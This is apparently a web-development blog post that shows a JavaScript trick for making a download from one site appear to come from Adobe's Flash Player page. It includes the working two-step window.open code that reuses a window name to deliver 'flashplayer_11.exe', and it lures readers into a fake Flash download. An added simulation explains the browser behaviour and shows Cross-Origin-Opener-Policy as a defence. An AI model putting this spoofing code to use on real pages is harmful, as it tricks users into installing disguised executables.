Malicious file download – and nobody will notice

I recently came across a very sneaky yet impressive way of tricking people into downloading a malicious file. But before you continue reading you might want to download the newest Flash Player version?! Yeah, I know Flash is dead, but please give it a try anyway and see if you notice anything strange about it…
Done? Ok. So what you just downloaded was, of course, not a new Flash Player version but a possibly malicious file from my website. Maybe you noticed that the file was requested from webdevwonders.com instead of adobe.com.
The name of the domain is actually the only easy way to notice that you are downloading a different file from a server other than the one you expected. Now imagine a malicious download from a domain like flashplayer-download.com. How many people would be suspicious, even if they read the name of the file host?
But let's have a look at the code now (by the way, this will NOT work in Internet Explorer):

// Called 'onclick' of the link
function openFlashWebsite() {
    // Opens a window named 'foo' whose data: URI immediately meta-refreshes to
    // http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer
    window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer">', 'foo');
    setTimeout(triggerDownload, 4500);
}
// Will be called after a timeout of 4.5 secs; targets the same window name 'foo'
function triggerDownload() {
    window.open('http://webdevwonders.com/download/flashplayer', 'foo');
}

Now what is happening here? First of all, the function “openFlashWebsite” is called by clicking the link. It opens a new window (or tab) named “foo” containing a “text/html” data URI, whose meta refresh immediately navigates that window to the Flash Player download site. Secondly, the function also starts a timeout, which fires after 4.5 seconds and opens, with the same window name “foo”, a document served with a “Content-Disposition: attachment;” header that triggers the download of a file called “flashplayer_11.exe”, which is served by this blog. The sneaky thing about it is that, because the second window.open reuses the window name, this download gets attached directly to the already opened window, which by then shows the Adobe Flash Player download site, tricking the user into thinking that this is the expected Flash Player download. This is made possible by the concept of web browser documents having the ability to navigate other (cross-origin) windows to arbitrary URLs. A deeper explanation of the issue is given in “The Tangled Web” by Michal Zalewski, whose blog also deserves the credit for this.
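To make the browser behaviour behind this concrete from the defender's side, here is a small Node.js simulation. It is an added example, not code from the original post: it models named-window targeting (a window name is only matched within the opener's browsing context group) and the Cross-Origin-Opener-Policy (COOP) response header, which a site such as the vendor's download page can send so that a cross-origin window that opened it can no longer navigate it afterwards. The origins (opener.example, vendor.example), the paths and the simplified COOP rule are constructed for the simulation and are not taken from the post.

```javascript
// Added example, not code from the original post: a simulation of
// named-window targeting and of the Cross-Origin-Opener-Policy (COOP) header.
// Origins, paths and the COOP rule are simplified and constructed for this demo.

let nextGroupId = 1;

class BrowsingContext {
  constructor(name, groupId) {
    this.name = name;
    this.groupId = groupId; // the browsing context group this window lives in
    this.url = 'about:blank';
  }
}

class Browser {
  // coopByOrigin maps an origin to the COOP header value it serves.
  constructor(coopByOrigin) {
    this.coopByOrigin = coopByOrigin;
    this.contexts = [];
  }

  coopFor(url) {
    return this.coopByOrigin[new URL(url).origin] || 'unsafe-none';
  }

  // Models window.open(url, name) issued from `opener`. A window name is only
  // matched against windows in the opener's own browsing context group; if
  // none matches, a new window is created there.
  open(opener, url, name) {
    let target = this.contexts.find(
      (c) => c.name === name && c.groupId === opener.groupId
    );
    const reused = target !== undefined;
    if (!target) {
      target = new BrowsingContext(name, opener.groupId);
      this.contexts.push(target);
    }
    this.navigate(target, url);
    return { target, reused };
  }

  // Simplified COOP rule: when a document that sends COOP "same-origin" (or
  // "same-origin-allow-popups") replaces a document from another origin, the
  // window is moved into a fresh browsing context group, so its opener can no
  // longer reach it by name or by reference.
  navigate(ctx, url) {
    const newOrigin = new URL(url).origin;
    const currentOrigin =
      ctx.url === 'about:blank' ? null : new URL(ctx.url).origin;
    if (this.coopFor(url) !== 'unsafe-none' && currentOrigin !== newOrigin) {
      ctx.groupId = nextGroupId++;
    }
    ctx.url = url;
  }
}

// Replays the two window.open calls from the post against a simulated vendor
// site and reports whether the second navigation (a file from the opener's
// origin) landed in the window that is showing the vendor's download page.
function simulate(vendorCoop) {
  const browser = new Browser({ 'https://vendor.example': vendorCoop });
  const openerPage = new BrowsingContext('', nextGroupId++);
  openerPage.url = 'https://opener.example/';
  browser.contexts.push(openerPage);

  const first = browser.open(openerPage, 'https://vendor.example/download', 'foo');
  const second = browser.open(openerPage, 'https://opener.example/file', 'foo');

  return {
    fileLoadedIntoVendorWindow: second.reused,
    vendorWindowUrl: first.target.url,
    popupCount: browser.contexts.length - 1,
  };
}

console.log('vendor sends no COOP:         ', simulate('unsafe-none'));
console.log('vendor sends COOP same-origin:', simulate('same-origin'));
```

Without COOP the second call finds the window named “foo” and replaces the vendor's page in it, which is exactly the effect the post describes. With `Cross-Origin-Opener-Policy: same-origin` on the vendor's download page, the window is cut off from its opener, the name lookup fails, and the file opens in a separate new window that visibly belongs to the other origin. Note that `rel="noopener"` on the vendor's own links does nothing against this pattern, because the vendor did not open the window; COOP is the control the navigated site itself can apply.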

This entry was posted in HTML/CSS, Javascript, Security/Privacy.
